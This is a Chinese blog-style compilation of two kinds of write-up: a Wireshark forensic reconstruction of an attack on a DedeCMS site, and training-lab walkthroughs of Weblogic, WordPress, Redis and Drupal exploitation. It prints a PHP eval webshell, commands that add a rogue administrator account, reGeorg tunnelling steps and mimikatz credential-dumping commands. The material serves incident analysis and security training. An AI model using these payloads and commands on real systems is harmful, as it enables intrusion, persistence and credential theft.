精华内容
下载资源
问答
  • 企业渗透测试和持续监控在线课程是白帽艺术系列视频的一部分,通过内部/外部侦察、社会工程、网络和漏洞扫描,逐步示范了对企业网络进行安全评估(渗透测试)的现实场景。 您还将学习如何执行web应用程序测试、...
  • 论文研究-高技术向纺织企业渗透临界规模研究.pdf, 从高技术渗透经济规律出发, 分析了高技术向纺织企业渗透临界规模的影响因素. 应用邹氏逐步检验法对长春纺织厂的微...
  • 数据分析-企业渗透过程 前记 本篇文章对真实企业渗透流量进行分析,其中包括最开始的目录爆破,到最后的反向代理文件上传成功 题目要求 黑客拿到一台服务器的权限,之后进行了内网渗透 1.被攻击的服务器的...

    数据分析-企业渗透过程

    前记

    本篇文章对真实企业渗透流量进行分析,其中包括最开始的目录爆破,到最后的反向代理文件上传成功

    题目要求

    黑客拿到一台服务器的权限,之后进行了内网渗透
    1.被攻击的服务器的内网地址
    2.被攻击的服务器的外网地址
    3.攻击者的ip地址
    4.爆破出的后台地址
    5.爆破出的后台登录用户名和密码
    6.webshell的完整路径
    7.被攻击服务器的主机名
    8.被攻击服务器的网站根目录
    9.黑客获得的权限

    数据分析

    题目给了大约6个G的数据文件
    直接盲目追踪tcp流显然是非常愚钝的方式。
    我们的首要目标应该是筛选出攻击者ip和受害者ip
    从而实现有效的定点溯源
    而日志文件这个时候就成了很好的切入点

    日志文件打开切入点

    我们选择日志文件查看
    排除内网地址,我们可以看到ip

    202.99.27.194

     

    疯狂对网站发起请求
    于是基本可以确定此ip为攻击者
    于是我们去wireshark中过滤出相应的攻击流

    第一个数据包分析

    打开第一个数据流,我们尝试命令

    ip.src == 202.99.27.194 && http
    可以发现大量流量如下图

     

    不难发现受害者内网ip为

    172.16.60.199
     
    同时得知黑客攻击的第一步为fuzz目标网站目录
    然后我们调用wireshark的http负载分配功能

    不难得出,受害者外网ip为

    118.194.196.232
     

    至此我们已经完成了题目的前3题:

    1.被攻击的服务器的内网地址
    2.被攻击的服务器的外网地址
    3.攻击者的ip地址
     
    答案:
    172.16.60.199
    118.194.196.232
    202.99.27.194
     

    第二个数据包分析

    然后题目要求我们找出后台地址
    故此我们使用过滤条件
    ip.src == 202.99.27.194 && http
    不难发现在第二个数据文件中,有如下结果

    黑客不断对  /simplexue/login.php

    进行post数据
    我们查看post内容,随便选取一个http请求头查看

    POST /simplexue/login.php HTTP/1.1
    Host: 118.194.196.232:800
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://118.194.196.232:800/simplexue/login.php
    Cookie: PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 73
    gotopage=&dopost=login&adminstyle=newdedecms&userid=admin&pwd=qwerty

    不难看出黑客在尝试密码爆破

    userid=admin&pwd=qwerty
     
    故此猜测出,该地址为受害者网站后台
    然后我们继续追踪,查看黑客是否爆破登录成功
    过滤指令如下:
    ip.src == 202.99.27.194 && http.request.method=="POST"

    然后我们将结果按照爆破时间排序
    发现最后一次post结果为

    gotopage=&dopost=login&adminstyle=newdedecms&userid=admin&pwd=admin123&sm1=
    即 
    userid=admin&pwd=admin123
    并且发现发现响应包
    Set-Cookie: DedeUserID=1; expires=Wed, 10-Aug-2016 02:36:28 GMT; path=/
    其中
    DedeUserID=1
     
    故此判断应该登录成功
    并且看到后面的标题
    <title>DedeCMS........</title>

    还能发现受害者网站使用了DedeCMS

     

    第四个数据包分析

    为什么没有第三个数据包分析= =
    因为第三个是黑客在寻找后台功能,最终找到可上传文件点
    这里就直接看第4个数据包了,因为基本都有涉及
    我们使用如下指令

    ip.src == 202.99.27.194 && http.request.method=="POST"

    不难发现

    我们查看

    /simplexue/file_manage_control.php
    可以发现黑客上传的http请求头
    POST /simplexue/file_manage_control.php HTTP/1.1
    Host: 118.194.196.232:800
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=upload&activepath=%2Fuploads
    Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------76031573231889
    Content-Length: 591
    -----------------------------76031573231889
    Content-Disposition: form-data; name="activepath"
    /uploads
    -----------------------------76031573231889
    Content-Disposition: form-data; name="fmdo"
    upload
    -----------------------------76031573231889
    Content-Disposition: form-data; name="upfile1"; filename="jian.php"
    Content-Type: application/octet-stream
    <?php eval($_POST[g]);?>
    <?php eval($_POST[g]);?>
    <?php eval($_POST[g]);?>
    -----------------------------76031573231889
    Content-Disposition: form-data; name="B1"
     ........ 
    -----------------------------76031573231889--

    黑客上传了一个名为jian.php

    一句话木马文件
    其中代码为  <?php eval($_POST[g]);?>

    到此我们已经又完成了2道题目

    4.爆破出的后台地址
    5.爆破出的后台登录用户名和密码
    答案:
    /simplexue/login.php
    userid=admin&pwd=admin123
     
    我们接着查看下一题
    6.webshell的完整路径
    我们查看黑客的第一条指令的http头
    POST /uploads/jian.php HTTP/1.1
    Host: 118.194.196.232:800
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 12
    g=phpinfo();

    不难发现黑客执行了phpinfo()命令
    返回中可以看到

    <b>Notice</b>: Use of undefined constant g - assumed 'g' in <b>C:\phpStudy\WWW\dedecms\uploads\jian.php</b> on line <b>1</b><br />

    即可发现webshell的绝对路径

    C:\phpStudy\WWW\dedecms\uploads\jian.php
    然后我们依次查看黑客执行的命令
    Form item: "g" = "system("whoami");"
    system("net user test test /ad");
    system("net localgroup administrators test /ad");
    system("net user test");
    system("netstat -ano");

    不难发现黑客添加了管理员用户,账号密码为test  test

    并且  netstat -ano

    内容为

    Proto  Local Address          Foreign Address        State           PID
    TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1512
    TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       960
    TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4008
    TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
    TCP    0.0.0.0:1039           0.0.0.0:0              LISTENING       668
    TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1608
    TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       4088
    TCP    172.16.60.199:80       202.99.27.194:41601    ESTABLISHED     392
    TCP    172.16.60.199:135      172.16.60.199:3869     ESTABLISHED     960
    TCP    172.16.60.199:139      0.0.0.0:0              LISTENING       4
    TCP    172.16.60.199:3144     95.80.107.117:3389     ESTABLISHED     1108
    TCP    172.16.60.199:3160     193.124.23.254:3389    ESTABLISHED     1108
    TCP    172.16.60.199:3162     200.27

    发现开放端口:80 135 443 445 1039 3306 3389

    为了更加详细的了解目标网站的存在问题
    我们导出phpinfo文件
    保存为1.html
    即可发现

    Windows NT SIMPLE-W7LOIJIF 5.2 build 3790 (Windows Server 2003 Enterprise Edition Service Pack 1) i586
    可以发现主机名为 SIMPLE-W7LOIJIF
     
    至此
    9道题目全部完结

     

    继续探索

    但是我们的深入研究之路还未结束,我们继续往后发掘
    在第6个数据包里
    我们执行过滤指令如下

    ip.src == 202.99.27.194 && http
    不难看到,黑客再次使用了上传功能

    其中我们看见上传内容
    POST /simplexue/file_manage_control.php HTTP/1.1
    Host: 118.194.196.232:800
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=upload&activepath=%2Fuploads
    Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------102512441528556
    Content-Length: 6315
    -----------------------------102512441528556
    Content-Disposition: form-data; name="activepath"
    /uploads
    -----------------------------102512441528556
    Content-Disposition: form-data; name="fmdo"
    upload
    -----------------------------102512441528556
    Content-Disposition: form-data; name="upfile1"; filename="tunnel.php"
    Content-Type: application/octet-stream
    <?php
    /*                   _____                                    
       ____   ______  __|___  |__  ______  _____  _____   ______  
     |     | |   ___||   ___|    ||   ___|/     \|     | |   ___| 
     |     \ |   ___||   |  |    ||   ___||     ||     \ |   |

     

    根据上传文件名,我们百度进行搜索
    发现这是一个内网反向代理的文件
    工具名为:http_reGeorg
    然后我们又在最后一个数据包里发现了黑客对反向代理文件的操作如下图

    最后黑客利用file_manage_control.php
    删除了自己上传的反向代理文件tunnel.php

    POST /simplexue/file_manage_control.php HTTP/1.1
    Host: 118.194.196.232:800
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=del&filename=tunnel.php&activepath=
    Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 74
    fmdo=del&activepath=&filename=tunnel.php&imageField1.x=34&imageField1.y=17

     

    然后,黑客删除了自己添加的用户

    Form item: "g" = "system("net user test /del");"
    Form item: "g" = "system("net user");"

    最后,黑客再次利用file_manage_control.php删除了自己的一句话木马文件

    POST /simplexue/file_manage_control.php HTTP/1.1
    Host: 118.194.196.232:800
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=del&filename=jian.php&activepath=%2Fuploads
    Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 82
    fmdo=del&activepath=%2Fuploads&filename=jian.php&imageField1.x=31&imageField1.y=17

     

    至此全渗透过程结束

     

    后记

    总体来说,黑客做了如下事情

    1.目录爆破
    2.爆破后台管理员账户
    3.寻找利用后台可利用功能
    4.一句话木马上传
    5.利用木马在目标机器上添加管理员用户
    6.黑客上传反向代理文件
    7.黑客进行内网渗透
    8.黑客结束渗透,进行尾部处理工作

     

    任重而道远!

    文章转载自(http://skysec.top/2018/04/21/%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90-%E4%BC%81%E4%B8%9A%E6%B8%97%E9%80%8F%E8%BF%87%E7%A8%8B/)

     

    转载于:https://www.cnblogs.com/Oran9e/p/8985435.html

    展开全文
  • 企业渗透2: 任务一、Weblogic反序列化 1.访问192.168.2.10:7001 2.使用weblogic工具 利用工具查看192.168.2.10根目录,发现在/home/flag目录下存在一个.txt文件,查看内容则为答案。 任务二、Wordpress 任意...

    企业渗透2:

    任务一、Weblogic反序列化

    在这里插入图片描述
    1.访问192.168.2.10:7001
    在这里插入图片描述
    2.使用weblogic工具
    在这里插入图片描述
    在这里插入图片描述
    利用工具查看192.168.2.10根目录,发现在/home/flag目录下存在一个.txt文件,查看内容则为答案。
    在这里插入图片描述

    任务二、Wordpress 任意文件读取

    1.使用wpscan工具(kali集成)扫描插件漏洞:
    用–enumerate vp选项。
    在这里插入图片描述
    在这里插入图片描述
    发现存在一个任意文件读取漏洞。点击终端中的提示网页,根据提示构造url:
    在这里插入图片描述
    可从显示的页面中得到flag的内容:

    在这里插入图片描述

    任务三、Wordpress命令执行

    在这里插入图片描述
    本任务的目的是通过wordpress主系统本身的漏洞进一步渗透,任务二只是获得了文件读取的能力,而不能命令执行。经过进一步的探测,判断这个wordpress中存在phpmailer的命令执行漏洞,这个漏洞的特点是通过HTTP包中的Host字段触发,唯一的前提条件是需要知道管理员的用户名。
    通过完成本实验任务,要求学生掌握浏览器配置代理的方法,利用Burpsuite抓包技术,使用Burpsuite的repeater模块测试漏洞存在的字段。掌握wordpress mailer命令执行漏洞的利用方法为完成后续企业渗透实验任务奠定坚实的漏洞利用技术基础。
    实验步骤:
    1.执行脚本获取flag
    /home/Hack文件夹下有一个脚本wordpress-rce-exploit.sh。
    在这里插入图片描述

    在这里插入图片描述

    任务四、通过改进漏洞利用脚本获得命令执行权限

    在这里插入图片描述
    1.修改漏洞利用脚本wordpress-rce-exploit.sh中,反弹ip的部分
    将反弹ip设置为本机ip。
    在这里插入图片描述
    2.执行脚本
    在这里插入图片描述
    3.与此同时,打开一个终端进行监听
    从下图可以发现,获得了反弹shell。
    在这里插入图片描述
    4.利用反弹shell获取flag信息
    使用shell扫描目标机的目录,发现在/home/asdjasdjalsd/目录下存在flag文件,查看文件内容即为结果。
    在这里插入图片描述

    在这里插入图片描述

    任务五、redis未授权访问+ffmpeg 任意文件读取

    在这里插入图片描述
    1.配置代理
    首先利用上一个任务获得的反弹shell,将配置代理所需要的文件tunnel.nosocket.php上传;
    在这里插入图片描述
    使用python开启一个服务;
    在这里插入图片描述
    访问目标网址下刚刚上传的脚本;
    在这里插入图片描述

    然后使用reGeorgeSocksProxy工具配置代理服务,下图中指定端口为2333,通道为192.168.2.11/tunnel.nosocket.php;
    在这里插入图片描述

    然后将/etc/目录下的proxychains.conf文件进行修改,将最后一行的端口改为刚刚reGeorgeSocksProxy工具设置的端口。
    在这里插入图片描述

    最后使用proxychains启动firefox,访问192.168.1.11,说明代理配置成功。
    在这里插入图片描述

    2.使用proxychains开启redis服务,查看配置文件位置
    输入"info",查看配置文件位置如下:
    在这里插入图片描述

    3.使用脚本生成恶意.avi文件
    使用脚本时,需要指定配置文件路径,如下图所示。
    在这里插入图片描述
    生成的123.avi文件如下所示:
    在这里插入图片描述

    4.访问192.168.1.11/upload,上传恶意文件123.avi
    在这里插入图片描述
    再去/download下载456.avi;
    在这里插入图片描述
    逐帧分析456.avi文件,即可找到flag1的值。

    5.使用redis连接,获取反弹shell
    通过对视频的分析,发现config指令被替换成了ccoonnffiigg,所以在输入指令的时候记得要替换。
    在这里插入图片描述
    成功获取反弹shell:
    在这里插入图片描述
    通过访问根目录,可以发现在/home/flag/目录下存在文件flag.txt,查看该文件内容即为答案。
    在这里插入图片描述

    在这里插入图片描述

    任务六、drupal8远程代码执行

    在这里插入图片描述
    1.访问192.168.1.10
    在这里插入图片描述

    2.使用弱口令登录
    admin admin
    3.使用drupal_exp.txt中的内容进行攻击
    访问如下图url:
    在这里插入图片描述
    在配置中填写如下所示,其中配置代码为drupal_exp.txt中内容。
    在这里插入图片描述

    4.查看上传的shell内容
    在这里插入图片描述
    5.使用cknife登录shell
    配置shell路径;
    在这里插入图片描述
    配置代理,这里的地址应该是127.0.0.1,不应该带有http://。
    在这里插入图片描述
    登录shell,查看网站根目录的flag.php文件内容:
    在这里插入图片描述
    在这里插入图片描述
    查看根目录的flag.txt文件内容:
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    展开全文
  • 企业渗透1: 任务一、后台文件上传 1.1使用目录扫描工具对目标网站的后台地址进行扫描(如wwwscan) 根据扫描结果可猜测管理员登录界面为/manager/login.php或/myadmin/。 尝试用root root弱口令登录/myadmin/,成功...

    企业渗透1:

    任务一、后台文件上传

    1.1使用目录扫描工具对目标网站的后台地址进行扫描(如wwwscan)
    在这里插入图片描述
    根据扫描结果可猜测管理员登录界面为/manager/login.php或/myadmin/。
    尝试用root root弱口令登录/myadmin/,成功登录数据库。发现数据库"admin"中的密码如下图密文所示:
    在这里插入图片描述
    在这里插入图片描述
    使用md5解密工具破解密码为"1q2w3e4r"。
    用户名:admin 密码:1q2w3e4r

    1.2使用爆破出的管理员密码登录后台
    在这里插入图片描述
    在这里插入图片描述

    任务二、Sql注入

    1.访问/sql目录,尝试sql注入攻击,好像没什么太大用处…
    在这里插入图片描述
    2.利用上一任务登录的后台,查看服务器根目录,上传shell.php文件。
    在这里插入图片描述
    其实到这一步已经可以得到Thisisyourflag中的内容,但为了后面实验的方便我们需要配置菜刀。
    在这里插入图片描述
    用菜刀登录后得到下图结果。
    在这里插入图片描述
    在这里插入图片描述

    任务三、phpmyadmin写shell

    在这里插入图片描述
    在之前的任务一中我们已经登录了数据库服务,直接找到flag表获取结果即可。
    在这里插入图片描述
    在这里插入图片描述

    任务四、扫描PC端并登陆

    1.上传RASscan.py到服务器,并使用中国菜刀打开终端,运行该python脚本;
    在这里插入图片描述
    运行结果如下:
    在这里插入图片描述
    2.使用reGeorge工具配置代理;
    首先查看reGeorge工具的使用说明:
    在这里插入图片描述
    根据说明书所写,首先将tunnel.nosocket.php上传到服务器并通过url访问;
    在这里插入图片描述
    然后通过终端,运行reGeorgeSocksProxy.py脚本,指定端口为8080,指定url为刚刚上传的tunnel.nosocket.php的url;
    在这里插入图片描述
    3.开启Proxifier并配置
    在这里插入图片描述
    在这里插入图片描述
    配置如上图所示。
    配置完成后,进行远程桌面连接。其中,远程桌面的密码可以在数据库中找到:
    在这里插入图片描述
    即topsec.123
    在这里插入图片描述

    登录完成后,查看c盘根目录中的flag文件即为答案。
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    任务五、抓取域控密码并登陆域控

    在这里插入图片描述
    使用mimikatz工具抓取密码:
    在这里插入图片描述
    输入:
    privilege::debug
    sekurlsa::logonpasswords
    在这里插入图片描述
    在这里插入图片描述
    得到密码如上图。用上图中的密码和用户名登录主机"192.168.2.10",在c盘根目录下查看flag文件内容:
    在这里插入图片描述
    在这里插入图片描述
    其实在实验环境里就已经给出登陆账户和密码了…

    展开全文
  • 本文原创作者: 一叶飘零原创投稿详情:重金悬赏 | 合天原创投稿等你来!前记上篇文章介绍了:流量分析-CTF题目实战,本篇文章对真实企业渗透流量进行分析,其中包括最开始的目录爆破,到最后...

    本文原创作者: 一叶飘零

    原创投稿详情:重金悬赏 | 合天原创投稿等你来!

    前记

    上篇文章介绍了:流量分析-CTF题目实战,本篇文章对真实企业渗透流量进行分析,其中包括最开始的目录爆破,到最后的反向代理文件上传成功

    题目要求

    黑客拿到一台服务器的权限,之后进行了内网渗透

    1.被攻击的服务器的内网地址

    2.被攻击的服务器的外网地址

    3.攻击者的ip地址

    4.爆破出的后台地址

    5.爆破出的后台登录用户名和密码

    6.webshell的完整路径

    7.被攻击服务器的主机名

    8.被攻击服务器的网站根目录

    9.黑客获得的权限

    数据分析

    题目给了大约6个G的数据文件

    直接盲目追踪tcp流显然是非常愚钝的方式。

    我们的首要目标应该是筛选出攻击者ip和受害者ip

    从而实现有效的定点溯源

    而日志文件这个时候就成了很好的切入点

    日志文件打开切入点

    我们选择日志文件查看

    排除内网地址,我们可以看到ip:202.99.27.194

    疯狂对网站发起请求

    于是基本可以确定此ip为攻击者

    于是我们去wireshark中过滤出相应的攻击流

    目标ip发掘

    打开第一个数据流,我们尝试命令

    ip.src == 202.99.27.194 && http

    可以发现大量流量如下图

    不难发现受害者内网ip为:172.16.60.199

    同时

    看到黑客大量访问网页目录

    且asp,jsp什么都在访问,不难看出黑客在进行目录fuzz

    然后我们调用wireshark的http负载分配功能

    不难得出,受害者外网ip为:118.194.196.232

    至此我们已经完成了题目的前3题:

    1.被攻击的服务器的内网地址

    2.被攻击的服务器的外网地址

    3.攻击者的ip地址

    答案

    172.16.60.199

    118.194.196.232

    202.99.27.194

    后台密码爆破探查

    然后题目要求我们找出后台地址

    故此我们使用过滤条件

    ip.src == 202.99.27.194 && http

    不难发现在第二个数据文件中,有如下结果

    黑客不断对

    /simplexue/login.php

    进行post数据

    我们查看post内容,随便选取一个http请求头查看

    POST /simplexue/login.php HTTP/1.1

    Host: 118.194.196.232:800

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

    Accept-Encoding: gzip, deflate

    Referer: http://118.194.196.232:800/simplexue/login.php

    Cookie: PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34

    Connection: close

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 73

    gotopage=&dopost=login&adminstyle=newdedecms&userid=admin&pwd=qwerty

    不难看出黑客在尝试密码爆破

    userid=admin&pwd=qwerty

    故此猜测出,该地址为受害者网站后台

    然后我们继续追踪,查看黑客是否爆破登录成功

    过滤指令如下

    ip.src == 202.99.27.194 && http.request.method=="POST"

    然后我们将结果按照爆破时间排序

    发现最后一次post结果为

    gotopage=&dopost=login&adminstyle=newdedecms&userid=admin&pwd=admin123&sm1=

    userid=admin&pwd=admin123

    并且发现发现响应包

    Set-Cookie: DedeUserID=1; expires=Wed, 10-Aug-2016 02:36:28 GMT; path=/

    其中

    DedeUserID=1

    故此判断应该登录成功

    并且看到后面的标题

    <title>DedeCMS........</title>

    还能发现受害者网站使用了DedeCMS

    getshell

    黑客找到了后台,并成功登录,最后上传了webshell

    我们使用如下指令

    ip.src == 202.99.27.194 && http.request.method=="POST"

    不难发现

    我们查看

    /simplexue/file_manage_control.php

    可以发现黑客上传的http请求头

    POST /simplexue/file_manage_control.php HTTP/1.1

    Host: 118.194.196.232:800

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

    Accept-Encoding: gzip, deflate

    Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=upload&activepath=%2Fuploads

    Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager

    Connection: keep-alive

    Content-Type: multipart/form-data; boundary=---------------------------76031573231889

    Content-Length: 591

    -----------------------------76031573231889

    Content-Disposition: form-data; name="activepath"

    /uploads

    -----------------------------76031573231889

    Content-Disposition: form-data; name="fmdo"

    upload

    -----------------------------76031573231889

    Content-Disposition: form-data; name="upfile1"; filename="jian.php"

    Content-Type: application/octet-stream

    <?php eval($_POST[g]);?>

    <?php eval($_POST[g]);?>

    <?php eval($_POST[g]);?>

    -----------------------------76031573231889

    Content-Disposition: form-data; name="B1"

     ........

    -----------------------------76031573231889--

    黑客上传了一个名为

    jian.php

    一句话木马文件

    其中代码为

    php

    <?php eval($_POST[g]);?>

    到此我们又完成了2道题目

    4.爆破出的后台地址

    5.爆破出的后台登录用户名和密码

    答案

    /simplexue/login.php

    userid=admin&pwd=admin123

    我们接着查看下一题

    >6.webshell的完整路径

    我们查看黑客的第一条指令的http头

    POST /uploads/jian.php HTTP/1.1

    Host: 118.194.196.232:800

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

    Accept-Encoding: gzip, deflate

    Cookie: PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager

    Connection: keep-alive

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 12

    g=phpinfo();

    不难发现黑客执行了phpinfo()命令

    返回中可以看到

    <b>Notice</b>:  Use of undefined constant g - assumed 'g' in <b>C:\phpStudy\WWW\dedecms\uploads\jian.php</b> on line <b>1</b><br />

    即可发现webshell的绝对路径

    C:\phpStudy\WWW\dedecms\uploads\jian.php

    然后我们依次查看黑客执行的命令

    Form item: "g" = "system("whoami");"

    system("net user test test /ad");

    system("net localgroup administrators test /ad");

    system("net user test");

    system("netstat -ano");

    不难发现黑客添加了管理员用户,

    账号为:test

    密码为:test

    为了更加详细的了解目标网站的存在问题

    我们导出phpinfo文件

    保存为1.html

    即可发现

    Windows NT SIMPLE-W7LOIJIF 5.2 build 3790 (Windows Server 2003 Enterprise Edition Service Pack 1) i586

    可以发现主机名为

    SIMPLE-W7LOIJIF

    至此9道题目全部完结

    整合所有答案

    1.被攻击的服务器的内网地址

    2.被攻击的服务器的外网地址

    3.攻击者的ip地址

    4.爆破出的后台地址

    5.爆破出的后台登录用户名和密码

    6.webshell的完整路径

    7.被攻击服务器的主机名

    8.被攻击服务器的网站根目录

    9.黑客获得的权限

    答案

    172.16.60.199

    118.194.196.232

    202.99.27.194

    /simplexue/login.php

    userid=admin&pwd=admin123

    C:\phpStudy\WWW\dedecms\uploads\jian.php

    SIMPLE-W7LOIJIF

    C:\phpStudy\WWW\dedecms\

    administrator

    继续探索

    但是我们的深入研究之路还未结束,我们继续往后发掘

    在第6个数据包里

    我们执行过滤指令如下

    ip.src == 202.99.27.194 && http

    不难看到,黑客再次使用了上传功能

    其中我们看见上传内容

    POST /simplexue/file_manage_control.php HTTP/1.1

    Host: 118.194.196.232:800

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

    Accept-Encoding: gzip, deflate

    Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=upload&activepath=%2Fuploads

    Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager

    Connection: keep-alive

    Content-Type: multipart/form-data; boundary=---------------------------102512441528556

    Content-Length: 6315

    -----------------------------102512441528556

    Content-Disposition: form-data; name="activepath"

    /uploads

    -----------------------------102512441528556

    Content-Disposition: form-data; name="fmdo"

    upload

    -----------------------------102512441528556

    Content-Disposition: form-data; name="upfile1"; filename="tunnel.php"

    Content-Type: application/octet-stream

    <?php

    /*                   _____                                    

       ____   ______  __|___  |__  ______  _____  _____   ______  

     |     | |   ___||   ___|    ||   ___|/     \|     | |   ___|

     |     \ |   ___||   |  |    ||   ___||     ||     \ |   |

    根据上传文件名,我们百度进行搜索

    发现这是一个内网反向代理的文件

    工具名为:`http_reGeorg`

    然后我们又在最后一个数据包里发现了黑客对反向代理文件的操作如下图

    最后黑客利用file_manage_control.php

    删除了自己上传的反向代理文件tunnel.php

    POST /simplexue/file_manage_control.php HTTP/1.1

    Host: 118.194.196.232:800

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

